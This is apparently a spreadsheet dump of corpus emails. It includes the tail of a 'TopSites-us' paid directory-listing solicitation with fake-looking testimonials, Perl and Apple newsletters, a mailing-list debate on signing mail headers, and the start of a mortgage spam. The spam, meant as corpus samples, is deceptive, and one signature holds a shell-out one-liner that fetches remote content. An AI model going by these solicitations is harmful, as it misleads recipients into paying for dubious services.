 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="100%"&gt;
 	&lt;i&gt;&amp;quot;TopSites-us is the least expensive way I have found to 
     bring buyers to my site. I have tried other online advertising companies and 
     you beat everyone!&amp;quot; &lt;/i&gt;&lt;br&gt; &lt;font color="#C0C0C0"&gt;--P.A., President, Go 
     Software (g-o.us) &lt;/font&gt;
       &lt;p&gt;&lt;i&gt;&amp;quot;TopSites-us makes my online marketing easy. 
       I can change my message 24 hours a day so it is always up-to-date. And 
       everyone who sees it is a pre-qualified prospect.&amp;quot; &lt;/i&gt;&lt;br&gt;
         &lt;font color="#C0C0C0"&gt;--N.B., CEO, My News (my-news.org)&lt;/font&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;/table&gt;&lt;br&gt;
   &lt;TABLE CELLSPACING="0" CELLPADDING="0" BORDER="0" WIDTH="100%" height="42"&gt;
   &lt;TR BGcolor="#CCCC99"&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="MIDDLE" HEIGHT="19" WIDTH="100%" NOWRAP&gt;&lt;b&gt;
     &lt;font face="ARIAL" size="2" color="#000066"&gt;FREQUENTLY ASKED QUESTIONS&lt;/font&gt;&lt;/b&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR BGcolor="#EEEED0"&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" COLSPAN="3" BGcolor="#C0C0C0" height="3"&gt;
     &lt;IMG SRC="http://topsitez.us/table_shaded_header_shadow.gif" WIDTH="100%" HEIGHT="3" BORDER="0"&gt;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR BGcolor="#EEEED0"&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	  &lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="100%" height="19"&gt; &lt;ul type="circle"&gt;
           &lt;li&gt; &lt;b&gt;Can I change my listing?&lt;/b&gt;&lt;br&gt;
             You can change your listing now or later. You can rewrite the headline 
             and description before renewing. You can change the URL tooeven to 
             another website. &lt;br&gt;
             Once we receive payment, we will send you instructions on how to change 
             your listing whenever you like. (Theres no charge to do this.)&lt;br&gt;
             &lt;br&gt;
           &lt;/li&gt;
           &lt;li&gt; &lt;b&gt;Can I change my category? &lt;br&gt;
             Can I list my site in additional categories?&lt;br&gt;
             Can I list other sites too?&lt;/b&gt;&lt;br&gt;
             You can list as many sites in as many categories as you like. Each 
             listing costs only $5 per month per category. Just go to &lt;a href="http://www.topsitez.us"&gt;www.topsitez.us&lt;/a&gt;. 
             Click on the category links until you find the one you want (or search 
             on your keywords). Click on the Add My Site link. Then type your listing. 
             If your old listing was in the wrong category, you can click &lt;a href="http://topsitez.us/cancel.htm?id=713164&amp;d=jmason.org"&gt;unsubscribe&lt;/a&gt; 
             to cancel it.&lt;br&gt;
             &lt;br&gt;
           &lt;/li&gt;
           &lt;li&gt; &lt;b&gt;How much does a listing cost?&lt;br&gt;
             Can I renew for free?&lt;/b&gt;&lt;br&gt;
             It costs $5 a month to list your site in TopSites. We no longer offer 
             any free listings. We will bill you $60 for 12 months. There are no 
             additional costs. You can change your listing as often as you like 
             for free. You can cancel your listing anytime and we will refund your 
             remaining money.&lt;br&gt;
             &lt;br&gt;
           &lt;/li&gt;
           &lt;li&gt; &lt;b&gt;How do I pay? &lt;/b&gt; &lt;br&gt;
             You can pay with a check from any country. (Simply convert the amount 
             to your local currency.) Or you can pay by Visa, MasterCard or American 
             Express. Simply select the option you prefer on the renewal form.&lt;br&gt;
             &lt;br&gt;
           &lt;/li&gt;
           &lt;li&gt; &lt;b&gt;Who listed us?&lt;br&gt;
             When did our listing start?&lt;/b&gt;&lt;br&gt;
             We do not know. Sorry. We only began to store listing contacts and 
             dates this year.&lt;br&gt;
             &lt;br&gt;
           &lt;/li&gt;
           &lt;li&gt; &lt;b&gt;How much did we pay to get listed? &lt;/b&gt;&lt;br&gt;
             Originally you couldnt buy a listingyou had to wait for our editors 
             to select you as one of the top sites in your category.&lt;br&gt;
             &lt;br&gt;
           &lt;/li&gt;
           &lt;li&gt; &lt;b&gt;Do we have a contract with you?&lt;br&gt;
             &lt;/b&gt;We dont do contracts for a $5 service.&lt;br&gt;
             &lt;br&gt;
           &lt;/li&gt;
           &lt;li&gt; &lt;b&gt;Can you call me and tell me more?&lt;br&gt;
             &lt;/b&gt;We are happy to answer all your questions by email but we dont 
             contact our customer by phone at this time. Sorry.&lt;br&gt;
             &lt;br&gt;
           &lt;/li&gt;
           &lt;li&gt; &lt;b&gt;Can I still renew after your deadline?&lt;br&gt;
             &lt;/b&gt;We give our customers a month to renew so dont worry too much 
             about the deadline.&lt;br&gt;
             &lt;br&gt;
           &lt;/li&gt;
           &lt;li&gt; &lt;b&gt;How do I see my listing?&lt;br&gt;
             I couldnt find it when I searched.&lt;/b&gt;&lt;br&gt;
             To save you time, I have included your listing at the end of this 
             email. Or you can see it on our website by clicking &lt;a href="http://topsitez.us/category-tab.htm?id=713164&amp;d=jmason.org"&gt;your 
             listing&lt;/a&gt;. Or you can go to &lt;a href="http://www.topsitez.us"&gt;www.topsitez.us&lt;/a&gt; 
             and click on the categories until you get to /Top/Computers/Software/Operating_Systems/Linux/Projects/Internet.&lt;br&gt;
             You can also see it at &lt;a href="http://www.topsitez.us"&gt;www.topsitez.us&lt;/a&gt; 
             by entering two or more keywords from your listing into our search 
             form. Since we have more than three million listings, you probably 
             wont find your listing by searching on only one word. And you definitely 
             wont find it if you search on words that are not in your listing. 
             &lt;br&gt;
             &lt;br&gt;
           &lt;/li&gt;
           &lt;li&gt; &lt;b&gt;What keywords display my listing? &lt;/b&gt; &lt;br&gt;
             &lt;b&gt;How do I change them?&lt;/b&gt;&lt;br&gt;
             Every word in your listing is a keyword. Anytime someone searches 
             on two or more words in your listing, we will display it. The only 
             way to change your keywords is to change the headline or description 
             of your listing.&lt;br&gt;
             &lt;br&gt;
           &lt;/li&gt;
           &lt;li&gt; &lt;b&gt;How much traffic did you send us last year?&lt;/b&gt;&lt;br&gt;
             We dont know. Sorry. We are working on adding this feature.
           &lt;/li&gt;
         &lt;/ul&gt;
         &lt;p&gt;&lt;a href="http://topsitez.us/faq/index.htm?id=713164&amp;d=jmason.org&amp;op=cat&amp;c=1"&gt;more...&lt;/a&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
   &lt;/TABLE&gt;
 &lt;br&gt;
   &lt;TABLE CELLSPACING="0" CELLPADDING="0" BORDER="0" WIDTH="100%" height="42"&gt;
   &lt;TR BGcolor="#CCCC99"&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="MIDDLE" HEIGHT="19" WIDTH="100%" NOWRAP&gt;&lt;b&gt;
     &lt;font face="ARIAL" size="2" color="#000066"&gt;YOUR LISTING&lt;/font&gt;&lt;/b&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR BGcolor="#EEEED0"&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" COLSPAN="3" BGcolor="#C0C0C0" height="3"&gt;
     &lt;IMG SRC="http://topsitez.us/table_shaded_header_shadow.gif" WIDTH="100%" HEIGHT="3" BORDER="0"&gt;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR BGcolor="#EEEED0"&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="100%" height="19"&gt;
 	&lt;b&gt;&lt;font face="arial,geneva" color="#cc3300"&gt;Internet Directory&lt;/font&gt;&lt;/b&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&lt;font face="arial,geneva" size="2"&gt;&lt;a href="http://spamassassin.taint.org/software/sitescooper/"&gt;Sitescooper: scoop websites onto your PalmPilot&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 Sitescooper automatically retrieves the stories from several news websites, trims    off extraneous HTML, and converts them into iSilo or Palm DOC format for later    reading on-the-move. It maintains a cache, and will avoid stories you've already    read. It can handle 1-page sites, 1-page with diffing, 2- and 3-level sites as well    as My-Netscape-style RSS sites. It's also very easy to add a new site to its list.    Even if you don't have a PalmPilot, it's still handy for simple website-to-text    conversion. Site files are included for many popular news sites including Slashdot,    LWN, Freshmeat and Linux Today.&lt;/font&gt;&lt;br&gt;
 &lt;font face="arial,geneva" size="2" color="#989898"&gt;http://jmason.org/software/sitescooper/&lt;/font&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&lt;font face="arial,geneva" size="2"&gt;&lt;a href="http://www.stud.uni-karlsruhe.de/~uno4/linux/whatissirobot.html"&gt;Linux // What is sirobot?&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 irobot is a Perl script that downloads Web pages recursively. The main advantage    over wget is its ability to get them concurrently. Sirobot is able to continue    aborted downloads, convert absolute links to relative ones, and has a    pattern-matching filter to prevent you from downloading the whole Internet.&lt;/font&gt;&lt;br&gt;
 &lt;font face="arial,geneva" size="2" color="#989898"&gt;http://www.stud.uni-karlsruhe.de/~uno4/linux/whatissirobot.html&lt;/font&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&lt;font face="arial,geneva" size="2"&gt;&lt;a href="http://www.swcp.com/~jgentry/pers.html"&gt;Linux Dialin Server Setup Guide&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 guide to setting up a Linux ppp/slip dialin server&lt;/font&gt;&lt;br&gt;
 &lt;font face="arial,geneva" size="2" color="#989898"&gt;http://www.swcp.com/~jgentry/pers.html&lt;/font&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&lt;font face="arial,geneva" size="2"&gt;&lt;a href="http://dpsftp.sourceforge.net/"&gt;pretzelgod's DPSFTP&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 Source for DPSFTP: Yet another Gnome FTP client&lt;/font&gt;&lt;br&gt;
 &lt;font face="arial,geneva" size="2" color="#989898"&gt;http://dpsftp.sourceforge.net/&lt;/font&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&lt;font face="arial,geneva" size="2"&gt;&lt;a href="http://www.tranchant.freeserve.co.uk/ftpq.html"&gt;ftpq home page&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 ftpq allows the user to spool FTP uploads whilst offline and transfer these jobs automatically on the next connection to the network.&lt;/font&gt;&lt;br&gt;
 &lt;font face="arial,geneva" size="2" color="#989898"&gt;http://www.tranchant.freeserve.co.uk/ftpq.html&lt;/font&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&lt;font face="arial,geneva" size="2"&gt;&lt;a href="http://developer.ez.no"&gt;eZ systems as&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 eZ publish is a content management system for e-commerce, e-publishing and intranets&lt;/font&gt;&lt;br&gt;
 &lt;font face="arial,geneva" size="2" color="#989898"&gt;http://developer.ez.no&lt;/font&gt;&lt;/li&gt;&lt;/ul&gt;&lt;a href="http://topsitez.us/category-tab.htm?id=713164&amp;d=jmason.org"&gt;more...&lt;/a&gt;&lt;/TD&gt;
 	&lt;TD ALIGN="LEFT" VALIGN="TOP" WIDTH="12" NOWRAP height="19"&gt;&amp;nbsp;&lt;BR&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
   &lt;/TABLE&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_000B_01C238C5.A7241DF0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-14
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * "Perl 6: Right Here, Right Now" slides ava
 +--------------------------------------------------------------------+
 | "Perl 6: Right Here, Right Now" slides ava                         |
 |   posted by gnat on Friday September 13, @12:01 (news)             |
 |   http://use.perl.org/article.pl?sid=02/09/13/162209               |
 +--------------------------------------------------------------------+
 [0]gnat writes "The wonderful Leon Brocard has released the slides from
 his lightning talk to the London perlmongers, [1]Perl 6: Right Here,
 Right Now, showing the current perl6 compiler in action."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/13/162209
 Links:
     0. mailto:gnat@oreilly.com
     1. http://astray.com/perl6_now/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</si>
  <si>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[SAtalk] Re: HELP! Someone stole our address...
</t>
  </si>
  <si>
    <t xml:space="preserve">On 4 Aug 2002 the voices made Scott A Crosby write:
 &gt; On Sun, 4 Aug 2002 16:36:57 +0200 (CEST), "Tony L. Svanstrom"
 &gt; &lt;tony@svanstrom.com&gt; writes:
 &gt;
 &gt; &gt; On Sun, 4 Aug 2002 the voices made Tony L. Svanstrom write:
 &gt; &gt;
 &gt; &gt;  The solution is of course to have a public key of some sort associated with
 &gt; &gt; the domainame itself, at the registrar-level, so that when an e-mail arrives
 &gt; &gt; the server can check if the sending-server actually is responsible for the
 &gt; &gt; domain/user the e-mail appears to have been sent from.
 &gt; &gt;
 &gt;
 &gt; That can be problematic.. For example, if I'm at home and want to send
 &gt; email out from my work-address; I can't go through my ISP's
 &gt; mailserver.. I don't thikn we want to enforce a link linking an email
 &gt; address and the server sending it; there are many reasons to have the
 &gt; two things be different entities.
  True, but that's the thinking of today, that the company mailserver can be
 closed to you from the outside; because as it is today you can use any mail-
 server that you've got access to. If there's a good reason for setting it up
 they won't be that lazy in the future.
 &gt; However, requiring mailservers to sign the Received: header...  That
 &gt; could be useful. (assuming the signature is of reasonable size). That
 &gt; could indicate at what server the email *did* enter the system. IT'd
 &gt; also be incontravertable proof that that mailserver did allow itself
 &gt; to be abused. Signatures could be checked by either MX or inaddr-arpa
 &gt; records indicating the host's public key.
 &gt;
 &gt; There's still some problems left though. You'd have to bind the
 &gt; headers to the message somehow, via signatures. (To avoid someone
 &gt; taking an email then twiddling the body and claiming that spam came
 &gt; from a particular host.) This would mean that you couldn't alter the
 &gt; body of a message.
 &gt;
 &gt; An unforgable Received chain would be very useful evidence.
  A simple RFC could fix that today, either using a new header or extending the
 Received-header with a code/value that the server later on can verify; maybe
 something like this:
 Received2: Date: [date];
 	Local: sub.dom2.tld (IP#2);
 	Remote: sub.dom3.tld (IP#3);
 	Env-id: &lt;the.usual.stuff@sub.dom1.tld&gt;
 	Code: [cache#, salted hashvalue, rsa or other signature]
  And then you have the two optional From and To, only added by the sending
 server that's identified the local sender or the server accepting mail for a
 certain user (to verify that it did really come via that server, in case you
 forward it using procmail or something like it).
  You of course would need some standard for how to check these headers.
  Not perfect, but better than what we have today.
 	/Tony
 -- 
 # Per scientiam ad libertatem! // Through knowledge towards freedom! #
 # Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #
     perl -e'print$_{$_} for sort%_=`lynx -source svanstrom.com/t`'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</si>
  <si>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&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/applecore/20020716.html"&gt;
       http://www.lockergnome.com/issues/applecore/20020716.html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#14367A }
  a:link    { COLOR: #2E64DC; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { COLOR: GRAY; text-decoration: none }
  a:hover   { color: GRAY; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #2E64DC; BORDER-BOTTOM: #14367A 4px solid; BORDER-LEFT: #94B2EE 4px solid; BORDER-RIGHT: #14367A 4px solid; BORDER-TOP: #94B2EE 4px solid; COLOR: #FFFFFF; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #94B2EE; BORDER-BOTTOM: #2E64DC 3px solid; BORDER-LEFT: #FFFFFF 3px solid; BORDER-RIGHT: #2E64DC 3px solid; BORDER-TOP: #FFFFFF 3px solid; COLOR: #14367A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020716 Lockergnome Apple Core&lt;/title&gt;&lt;/head&gt;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color="#14367A" face="Verdana, Tahoma, Arial" style="font-size: 10pt" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;
 &amp;nbsp; 07.16.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font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Of the comments I received on AppleScript, every single one suggested I 
 start with the basics, for that reason,  I'm going to take things 
 step-by-step,  following my own learning process and progressing to 
 gradually more difficult concepts. Despite having experience in 
 programming, using a variety of languages, I initially found AppleScript 
 to be quite intimidating -- mostly because something about the Script 
 Editor seems less than intuitive. If you've already been dabbling in 
 scripting, the first few columns on the subject will definitely be 
 targeted at novices, but I want to everyone to have the chance to get 
 up to speed.
 &lt;p&gt;
 I'm off to the 
 &lt;a href="http://www.sic.org"&gt;Shareware Industry Conference&lt;/a&gt; for the remainder of the week, 
 where it's looking like the selection of stuff for Mac users will be very 
 bleak. I believe the organization is targeted more toward the Windows 
 community in general and any shareware developer with enough cash to get 
 there is probably going to be in New York for MacWorld. I'll be missing 
 out on the Web cast of Steve Jobs speech, which is scheduled to take place 
 while I'm in the car, but at least I'll be able to catch the details at 
 other Mac sites when I get to St. Louis. Internet access for the trip is 
 being provided by Crosspaths.net, which is one of the few dialup services 
 I've found that can be configured to relay my Lockergnome mail so that I 
 can still function on the road. I tested the service on my iBook this 
 evening just to be sure.
 &lt;p&gt;
 With some luck, I may be able to get Internet access from the highway, via 
 my Kyocera 6035, and see what Jobs had to say before I get to St. Louis. 
 Unfortunately, there's no support for OS X yet with the 6035, so I can't 
 use the unlimited nights and weekends to dial the Web from my laptop. A 
 landline will probably be more sensible anyway. Check my blog for some 
 updates on the trip, Lori's attending too and I'm sure she'll be taking 
 lots of photos, as usual.
 &lt;p align="right"&gt;See You in &lt;a target="_blank" href="http://www.gnomedex.com/"&gt;August&lt;/a&gt;,&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;font style="font-size: 23pt" face="Jake Ludington, Script" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/P&gt;
 &lt;!-- DOWNLOADS --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeDOWNLOADS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Same-X v2.0 [1.73MB] OSX 10.1.1 FREE&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.thumpbunny.com/"&gt;http://www.thumpbunny.com/&lt;/a&gt;&lt;p&gt;
 Seven themes, two board sizes and your choice of difficulty levels, makes 
 this a game for the entertainment addict in all of us. The object is to 
 clear the board of all icons, removing them in matching clusters of two 
 or greater at a time. Clearing the screen awards bonus points and scoring 
 awards clearing of larger clusters. Nothing gets killed, there's no 
 swearing, but you'll find yourself addicted to the mindless fun anyway -- 
 not to mention you can feel safe sharing this with kids.
 &lt;!-- GnomeNETWORK --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeNETWORK&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Samba Sharing Package v1.5 [8.3MB] OS X FREE&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://xamba.sourceforge.net/ssp/"&gt;http://xamba.sourceforge.net/ssp/&lt;/a&gt;&lt;p&gt;
 It remains to be seen whether 10.2 will render this type of application 
 unnecessary, but for those out there without the cash to spend on DAVE, 
 for small office or home networking of Mac/PC mixed environments, this 
 is the only real alternative. Installation and configuration is almost 
 painless, making it easy for your Windows machine to see apps on your 
 Mac with little difficulty. The interface, like most OS X GUI apps, is 
 quite easy to navigate, including user management, connection 
 management, and share configuration into a convenient Prefernce pane.
 &lt;!--  GnomeSCRIPT --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSCRIPT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 Technically speaking, you could do most of your script writing in a text editing 
 application like TextEdit, but ultimately you've got to compile it in the Script 
 Editor, so you might as well start there. The Script Editor is located in the 
 AppleScript subfolder of your Applications folder. Opening the application for 
 the first time reveals a small window divided in to two sections, Description 
 and the actual scripting pane, separated by a group of buttons.
 &lt;p&gt;
 Ignore the buttons for the moment and concentrate on the two text panes. The 
 Description pane is where you label your script, so you can remember later what 
 it does. This is also the place you denote the key combination that will invoke 
 your script. If you choose to save your script as an executable application, the 
 information in the description will show up in the start up screen.
 &lt;p&gt;
 The second pane is where the magic happens. In this pane you will be telling 
 applications to do specific tasks when your script runs. The format for scripting 
 is fairly linear. You either start your script at the top most level drilling 
 down, until you actually reach the application or object you want to manipulate 
 with your script, or you take the reverse approach manipulating things from the 
 bottom up. Telling the "Applications" folder to tell its "Jake" subfolder to tell 
 the application "Jake's Media Player," located in that folder to do something 
 could also be written by telling the script to access "Jake's Media Player" 
 located in the "Jake" subfolder of the "Applications folder,  The upcoming example 
 will make this a bit more clear.
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Buy One Inkjet Cartridge - GET TWO FREE!!&lt;/b&gt; 
 Buy 1 Get 2 FREE on Most Epson, Canon, and Apple
 Cartridges. Wholesale Pricing on Lexmark Cartridges.
 Free Shipping on orders $25 or more!! U.S. Shipping Only.
 &lt;a href="http://psstt.com/1/c/22869/56049/191532/191532"&gt;Click Here For a Complete List of Cartridges&lt;/a&gt;.   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- FAVORITE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFAVORITE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Glitschka.com&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.glitschka.com"&gt;http://www.glitschka.com&lt;/a&gt;&lt;p&gt;
 Flash animations,  downloadable icons, artistic doodles, and details about 
 the artist himself are available from this site. You're guaranteed to find 
 something entertaining here, and if you need a logo designed, Von Robert 
 Glitschka might even take you on as a client. The portfolio is extensive, 
 including stock images and even some icons by the artist's seven year old 
 daughter. A must read is the anatomy of an illustration section, which lays 
 down artistic opinion, straight from Glitschka's mouth on how to make a 
 funny creation. This is by no means a Mac only site, the entertainment is 
 accessible by everyone and icons are available in both Mac and PC versions.
 &lt;!-- GnomeTIP --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeTIP&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 Traditionally, Mac OS has always placed a link to various disks in use on the 
 desktop, which can be convenient, but is no longer necessary with the Finder 
 only a Command+Tab away in the Dock. My personal desktop is usually cluttered 
 with files I've downloaded from the Internet, so I can never find anything 
 when my desktop is in plain sight, the Finder is the only way I stay organized. 
 For desktop slobs like me, or for neat freaks who want nothing on the desktop, 
 OS X includes three handy options for keeping disks in their place. Open the 
 Finder Preferences window and uncheck the three checkboxes under Show these 
 items on the Desktop. You'll have more space for other icons to clutter the 
 desktop or in the case of you clean folk, you'll have nothing at all.
 &lt;p class="url" align="right"&gt;Tip by &lt;a href="mailto:jake@lockergnome.com?subject=Tip Feedback"&gt;Jake&lt;/a&gt;
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/applecore/20020716.html"&gt;http://www.lockergnome.com/issues/applecore/20020716.html&lt;/a&gt;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color="#14367A" face="Verdana, Tahoma, Arial" style="font-size: 8pt"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href="https://www.sandhills.com/secure/smartcomputing/cpufreetrial.asp?source=cpu235"&gt;Computer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amp;#109;&amp;#97;&amp;#105;&amp;#108;&amp;#116;&amp;#111;&amp;#58;&amp;#102;&amp;#101;&amp;#101;&amp;#100;&amp;#98;&amp;#97;&amp;#99;&amp;#107;&amp;#64;&amp;#108;&amp;#111;&amp;#99;&amp;#107;&amp;#101;&amp;#114;&amp;#103;&amp;#110;&amp;#111;&amp;#109;&amp;#101;&amp;#46;&amp;#99;&amp;#111;&amp;#109;?subject=Lockergnome Apple Core Comment"&gt;E-mail the Editors&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p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src="http://www.lockergnome.com/images/webcam/jakecam.jpg"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;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</si>
  <si>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
 --4Ckj6UjgE2iN1+kY
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 &gt; http://www.spamassassin.org
 &gt; Is anyone besides me having problems getting to the site?
 What site is that one?  Isn't this site on sourceforge the official
 home page?
   http://spamassassin.sourceforge.net/
 Bob
 --4Ckj6UjgE2iN1+kY
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9O3xf0pRcO8E2ULYRAnFFAJ4oIMwUH/vPP4yjvt7z8Gv/7CyFHgCfTmd6
 nFFjYpkscA/GZoaiF8MBKCU=
 =Udmt
 -----END PGP SIGNATURE-----
 --4Ckj6UjgE2iN1+kY--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</si>
  <si>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Rates DROPPED! Refinancing your house can SAVE you big dollars!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;META NAME=3D"GENERATOR" CONTENT=3D"Arachnophilia 3.9"&gt;
 &lt;META NAME=3D"FORMATTER" CONTENT=3D"Arachnophilia 3.9"&gt;
 &lt;title&gt;Lender's Network&lt;/title&gt;
 &lt;style fprolloverstyle&gt;A:hover {color: #FF0000}
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"tan" background=3D""&gt;
 &lt;B&gt;&lt;CENTER&gt;&lt;FONT SIZE=3D"5" COLOR=3D"#000000" FACE=3D"Times New Roman"&gt;&lt;U&gt;=
 &lt;B&gt;&lt;CENTER&gt;The Lenders Network!&lt;/CENTER&gt;&lt;/B&gt;&lt;/U&gt;&lt;/FONT&gt;&lt;/CENTER&gt;&lt;/B&gt;
 &lt;th align=3D"center" nowrap width=3D"334" height=3D"190" valign=3D"top"&gt;
 &lt;p&gt;
